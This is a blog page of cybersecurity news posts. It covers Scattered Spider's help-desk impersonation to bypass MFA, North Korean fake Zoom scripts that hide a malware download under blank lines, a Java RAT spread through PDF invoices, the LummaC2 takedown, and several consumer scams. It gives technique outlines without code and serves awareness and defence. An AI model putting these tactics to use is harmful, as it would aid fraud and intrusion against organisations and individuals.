Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label cyberattacks trending news. Show all posts
Scattered Spider Threat Group
cyber attack Cyber Fraud cyberattacks trending news FBI Scattered Spider Threat Group

FBI Raises Alarm as Scattered Spider Threat Group Expands Target Sectors

 

The Federal Bureau of Investigation (FBI) has issued a high-level cybersecurity alert warning about the growing threat posed by Scattered Spider, a cybercriminal group now targeting the transportation sector specifically the aviation industry and expanding its focus to insurance companies. Previously associated with large-scale ransomware attacks in the retail sector, including a significant breach at Marks & Spencer in the UK that resulted in losses exceeding $600 million, the group is now shifting tactics and industries. 

A recent analysis by cybersecurity firm Halcyon, confirmed by the FBI, highlights how Scattered Spider is using advanced social engineering to bypass multi-factor authentication (MFA), often by impersonating employees or contractors and deceiving IT help desks into adding unauthorized MFA devices. The FBI has urged organizations to strengthen their MFA procedures and report any suspicious activity promptly. Research from Reliaquest shows the group often spoofs technology vendors and specifically targets high-access individuals like system administrators and executives.

Scattered Spider is financially driven and reportedly connected to a broader cybercriminal collective known as The Community. Its collaborations with ransomware operators such as ALPHV, RansomHub, and DragonForce have enabled it to access sophisticated cyber tools. What makes the group particularly dangerous is its ability to blend technical skill with social engineering, recruiting English-speaking attackers with neutral accents and regional familiarity to convincingly impersonate support staff during Western business hours. Real-time coaching and detailed scripts further enhance the success of these impersonation efforts.

Beyond aviation, experts are now seeing signs of similar attacks in the U.S. insurance sector. Google’s Threat Intelligence Group confirmed multiple such incidents, and security leaders warn that these are not isolated cases. Jon Abbott, CEO of ThreatAware, emphasized that this trend signals a broader threat landscape for all industries. 

Richard Orange of Abnormal AI noted that Scattered Spider relies more on manipulating human behaviour than exploiting software vulnerabilities, often moving laterally across systems to gain broader access. The group’s exploitation of supply chain links has been a consistent tactic, making even indirect associations with targeted sectors a point of vulnerability. As the FBI continues to work with affected industries, experts stress that all organizations, regardless of sector, must enhance employee awareness, implement strict identity verification, and maintain vigilance against social engineering threats.
Read more »
North Korea cyberattacks
cyberattacks trending news malware Malware attacks News North Korea North Korea Hackers North Korea cyberattacks

North Korean Hackers Target Fintech and Gaming Firms with Fake Zoom Apps

 

A newly uncovered cyber campaign is targeting organizations across North America, Europe, and the Asia-Pacific by exploiting fake Zoom applications. Cybersecurity experts have traced the operation to BlueNoroff, a notorious North Korean state-backed hacking group affiliated with the Lazarus Group. The campaign’s primary focus is on the gaming, entertainment, and fintech sectors, aiming to infiltrate systems and steal cryptocurrency and other sensitive financial data. 

Attack strategy 

The attack begins with a seemingly innocuous AppleScript disguised as a routine maintenance operation for Zoom’s software development kit (SDK). However, hidden within the script—buried beneath roughly 10,000 blank lines—are malicious commands that quietly download malware from a counterfeit domain, zoom-tech[.]us. 

Once the malware is downloaded, it integrates itself into the system through LaunchDaemon, granting it persistent and privileged access at every system startup. This allows the malware to operate covertly without raising immediate alarms. The malicious software doesn’t stop there. It fetches additional payloads from compromised infrastructure, presenting them as legitimate macOS components like “icloud_helper” and “Wi-Fi Updater.” 

These files are designed with anti-forensics techniques to erase temporary files and conceal their activity, all while maintaining a hidden backdoor for remote control and data exfiltration. This deceptive approach is particularly dangerous in remote work environments, where minor software issues are often resolved without deep inspection—making it easier for such malware to slip past unnoticed. 

Motives behind the attack

BlueNoroff’s intent appears financially driven. The malware specifically searches for cryptocurrency wallet extensions, browser-stored login credentials, and authentication keys. In one known incident dated May 28, a Canadian online gambling platform fell victim to this scheme after its systems were compromised via a fraudulent Zoom troubleshooting script. 

Protection Measures for Organizations Given the growing sophistication of such campaigns, security experts recommend several protective steps: 

• Independently verify Zoom participants to ensure authenticity. 

• Block suspicious domains like zoom-tech[.]us at the firewall level. 

• Deploy comprehensive endpoint protection that can detect hidden scripts and unauthorized daemons. 

• Invest in reliable antivirus and ransomware protection, especially for firms with cryptocurrency exposure. 

• Use identity theft monitoring services to detect compromised credentials early. 

• Train employees to recognize and respond to social engineering attempts. 

• Secure digital assets with hardware wallets instead of relying on software-based solutions alone.
Read more »
Visa news
cyberattacks trending news Hacker USA Visa news

US Embassy Cautions Visa Applicants After Bengaluru Man Falls Prey to Scam

 

The US Embassy in New Delhi has issued a cautionary alert to individuals applying for US visas, urging them to be wary of online scams that falsely promise to expedite visa interview appointments. This warning comes in the wake of a cyber fraud case reported from Bengaluru, where a 45-year-old engineer was duped by a scammer posing as a facilitator on the Telegram messaging app. 

According to reports, the engineer, a resident of RR Nagar, came across a Telegram channel on May 22 that appeared to offer assistance in advancing B-1/B-2 visa interview dates. His appointment was initially set for April 2026. Shortly after joining the channel, he was contacted by someone claiming to be Vanam Sravan Krishna. The individual promised to reschedule the appointment for a fee of ₹10,000. Trusting the offer, the victim shared his US visa portal login credentials and transferred the amount. 

The scammer later sent a forged appointment confirmation and demanded an additional ₹10,000, threatening to change the login credentials if the payment wasn’t made. After the second payment, the fraudster locked the victim out of his visa account by altering the credentials. A case was subsequently filed with the West CEN police on May 24, and investigations are ongoing. 

Following the incident, the US Embassy took to social media to warn applicants that any claim of fast-tracking visa appointments for money is fraudulent. The post emphasized that personal information and login details should never be shared with unverified sources. Embassy officials reiterated that only official platforms should be used for visa-related processes. 

A senior official from the Criminal Investigation Department noted that the applicant may not receive support from the embassy in this case, as he voluntarily shared his credentials and attempted to bypass the official process. According to the officer, the applicant may no longer be able to generate a fresh visa request. 

The incident comes amid evolving visa policies, including proposals reportedly under consideration by US authorities to introduce a $1,000 premium processing fee for faster interview appointments. This follows a broader move to tighten visa screening procedures, including the suspension of new student and visitor visa interviews in several countries. The embassy’s latest alert serves as a reminder to applicants to rely solely on official sources and to be vigilant against offers that appear too good to be true.
Read more »
Microsoft
cyberattacks trending news cybercrime news FBI malware Microsoft

U.S. Shuts Down LummaC2 Malware Network in Major Takedown

 

In a major crackdown on cybercrime, the U.S. Department of Justice (DOJ), in coordination with the FBI and Microsoft, has dismantled a global malware operation known as LummaC2 by seizing five internet domains used to deploy the infostealer malware. LummaC2, notorious for stealing personal and financial data such as browser history, login credentials, and cryptocurrency wallet information, had compromised at least 1.7 million systems worldwide. 

The takedown occurred over three days in May 2025, with two domains seized on May 19, followed by the rapid seizure of three additional domains after the malware operators attempted to restore access. These domains acted as user panels for cybercriminals leasing or buying access to the malware, allowing them to deploy it across networks and extract stolen data. 

FBI Assistant Director Bryan Vorndran said, “We took action against the most popular infostealer service available in online criminal markets. Thanks to partnerships with the private sector, we were able to disrupt the LummaC2 infrastructure and seize user panels.” 

DOJ Criminal Division head Matthew R. Galeotti added, “This type of malware is used to steal personal data from millions, facilitating crimes such as fraudulent bank transfers and cryptocurrency theft.” In a parallel move, Microsoft launched a civil legal action to take down 2,300 more domains believed to be linked to LummaC2 actors or their proxies. 

Emphasising the value of collaboration, Sue J. Bai, chief of the DOJ’s National Security Division, said, “Today’s disruption is another instance where our prosecutors, agents, and private sector partners came together to protect us from the persistent cybersecurity threats targeting our country.” 

The operation, led by the FBI’s Dallas Field Office and supported by several DOJ divisions, forms part of a broader U.S. strategy to counter cyber threats, including a State Department programme offering up to $10 million for information on individuals targeting U.S. critical infrastructure.
Read more »
PDF malware
cyberattacks trending news malware News PDF malware

Multiplatform Malware Campaign Uses PDF Invoices to Deploy Java-Based RAT

 

A new wave of cyberattacks is sweeping across digital infrastructures globally, leveraging weaponised PDF invoices to infiltrate systems with a sophisticated Java-based Remote Access Trojan (RAT). Security researchers from Fortinet have identified a multi-stage, evasive malware campaign targeting Windows, Linux, and macOS devices, exploiting the cross-platform capabilities of Java to establish remote control over compromised machines. 

The attack chain begins with phishing emails that appear to contain legitimate invoice attachments. These emails pass domain authentication checks—such as SPF validation—by misusing the serviciodecorreo.es mail service, which is permitted to send messages on behalf of numerous domains. The attached PDF lures recipients with urgent invoice-related messaging, prompting them to click embedded buttons that lead to the next stage of infection. 

Once a user interacts with the PDF, they are redirected to a Dropbox-hosted HTML file titled “Fattura”—the Italian word for “invoice.” This file prompts a basic CAPTCHA check before further redirecting the victim to a URL generated by Ngrok, a legitimate tunneling service often abused to conceal malicious activity. 

What makes this campaign particularly difficult to detect is its use of geolocation filtering. Depending on the user’s IP address, the final content differs: users located in Italy receive a Java Archive (JAR) file camouflaged under generic filenames such as “FA-43-03-2025.jar,” while users from other regions are shown an innocuous Google Drive document containing a non-malicious invoice from an entity named Medinova Health Group. This strategy effectively thwarts email security platforms that scan links from centralised cloud environments, which often lack region-specific browsing behaviour. 

If the user downloads and runs the JAR file, a Java-based Remote Access Trojan known as RATty is deployed. This malware allows attackers to execute remote commands, log keystrokes, capture screenshots, access files, and even control webcams and microphones. By exploiting the Java Runtime Environment (JRE), the RAT functions across operating systems, significantly broadening its potential victim base. To further evade detection, the campaign uses trusted platforms like Dropbox and MediaFire to host malicious components. Additionally, Ngrok’s dynamic tunneling service helps the attackers disguise their infrastructure, making attribution and blocking more difficult. 

The attackers have also conducted reconnaissance to identify vulnerable domains, optimising their strategy for maximum penetration and persistence. Security experts warn that the use of such multilayered and cross-platform infection techniques reflects the growing sophistication of threat actors. The campaign not only highlights the critical need for advanced threat detection systems but also reinforces the importance of user awareness, particularly around email-based social engineering tactics. 

Organisations are urged to ensure their endpoint protection tools are updated and to consider restricting the execution of Java applications from unknown sources. Furthermore, robust geofencing-aware email filtering and sandboxing solutions could help in flagging such targeted, region-specific attacks before they escalate.
Read more »
News
Bitdefender cyber attack cyberattacks trending news News

Bitdefender Warns of Surge in Subscription Scams Disguised as Online Stores and Mystery Boxes

 

Cybersecurity researchers at Bitdefender have uncovered a sharp increase in deceptive online subscription scams, with fraudsters disguising themselves as legitimate e-commerce platforms and mystery box vendors. These sophisticated schemes are luring unsuspecting users into handing over sensitive credit card details under the guise of low-cost purchases. 

Unlike older, more obvious fraud attempts, this new wave of scams involves meticulously crafted fake websites that mimic real online shops. Bitdefender’s investigation revealed over 200 fraudulent sites offering goods such as footwear, apparel, and electronic gadgets. 

The catch? Victims unknowingly agree to recurring subscription charges cleverly hidden in the fine print. One tactic gaining traction is the so-called “mystery box” scam. These scams entice consumers with a small upfront fee in exchange for a surprise package, often marketed as unclaimed luggage or packages left behind at airports or post offices. 
However, the real goal is to harvest personal and payment information, often enrolling victims in recurring payment plans before the transaction is even finalized. The scams are widely advertised on social media platforms, including Facebook, through sponsored posts. 

In many cases, scammers pose as content creators or use fake influencer pages to build trust. Bitdefender researchers found more than 140 websites pushing these scams, with many traced back to a recurring address in Limassol, Cyprus—an address also linked to entities named in the Paradise Papers by the ICIJ Offshore Leaks Database. 

Some websites go further, advertising discounted “member prices” that require account top-ups, like a charge of €44 every two weeks, often concealed in promotional offers. These scams frequently promote multiple membership levels, using store credits and promises of steep discounts to mask overpriced or outdated products. 

Bitdefender warns that the evolving nature of these scams—complete with high-quality websites, paid advertising, and fake brand endorsements—makes them harder to detect. With the profitability of subscription fraud rising, scammers are scaling their operations, expanding beyond mystery boxes into bogus product sales and investment offers. 

Researchers caution users to stay vigilant while shopping online, especially when prompted to enter payment information for deals that seem too good to be true. As these tactics grow more elaborate, consumers are urged to read the fine print and verify the authenticity of online shops before completing any transactions.
Read more »
Phishing Attacks
Cyber Attacks cyberattacks trending news Netflix cybersecurity News phishing Phishing Attacks

Netflix Users Warned About AI-Powered Phishing Scam

 

Netflix subscribers are being warned about a sophisticated phishing scam circulating via email, designed to steal personal and financial information. 

The deceptive email mimics an official Netflix communication, falsely claiming that the recipient’s account has been put on hold. It urges users to click a link to resolve the issue, which redirects them to a fraudulent login page that closely resembles Netflix’s official site. 

Unsuspecting users are then prompted to enter sensitive details, including their Netflix credentials, home address, and payment information. Cybersecurity experts caution that phishing scams have become more advanced with the rise of AI-driven tactics. 

According to Jake Moore, Global Cybersecurity Advisor at ESET, artificial intelligence has enabled cybercriminals to launch phishing campaigns at an unprecedented scale, making them appear more legitimate while targeting a larger number of users. 

“Despite these advancements, many scams still rely on urgency to pressure recipients into acting quickly without verifying the sender’s authenticity,” Moore explained. 

Users are advised to remain vigilant, double-check email sources, and avoid clicking on suspicious links. Instead, they should visit Netflix directly through its official website or app to verify any account-related issues.
Read more »
Ransomware
cyberattacks trending news Cybersecurity Attack malware News Ransomware

Cisco Talos Uncovers Lotus Blossom’s Multi-Campaign Cyber Espionage Operations

Cisco Talos has uncovered a series of cyber espionage campaigns attributed to the advanced persistent threat (APT) group Lotus Blossom, also known as Spring Dragon, Billbug, and Thrip. 

The group has been active since at least 2012, targeting government, manufacturing, telecommunications, and media sectors in regions such as the Philippines, Vietnam, Hong Kong, and Taiwan. Talos identified Sagerunex, a backdoor tool used exclusively by Lotus Blossom, as the core malware in these campaigns. 

The investigation revealed multiple variants of Sagerunex, evolving from its original form to leverage third-party cloud services such as Dropbox, Twitter, and Zimbra webmail as command-and-control (C2) tunnels, instead of traditional Virtual Private Servers (VPS). This shift helps the group evade detection while maintaining control over infected endpoints. 

The group has been observed gaining persistence on compromised systems by embedding Sagerunex into the system registry and configuring it to run as a service. The malware operates as a dynamic link library (DLL), executed directly in memory to avoid detection. The campaigns also showcase long-term persistence strategies, allowing attackers to remain undetected for months. 

Beyond Sagerunex, Lotus Blossom employs an arsenal of hacking tools to facilitate credential theft, privilege escalation, and data exfiltration. These include a Chrome cookie stealer from GitHub, a customized Venom proxy tool, a privilege adjustment tool, and an archiving tool for encrypting and stealing data. 

Additionally, the group utilizes mtrain V1.01, a modified HTran proxy relay tool, to route connections between compromised machines and external networks. The attack chain follows a structured multi-stage approach, starting with reconnaissance commands such as “net,” “tasklist,” “ipconfig,” and “netstat” to gather system details. 

If an infected machine lacks direct internet access, the attackers leverage proxy settings or the Venom tool to establish connectivity. A notable tactic involves storing malicious tools in the “public\pictures” subfolder, a non-restricted directory, to avoid detection.

Talos’ research underscores the growing sophistication of Lotus Blossom, which continues to refine its techniques and expand its capabilities. With high confidence, Cisco attributes these campaigns to Lotus Blossom, highlighting its sustained cyber espionage operations against high-value targets.
Read more »
Subscribe to: Posts (Atom)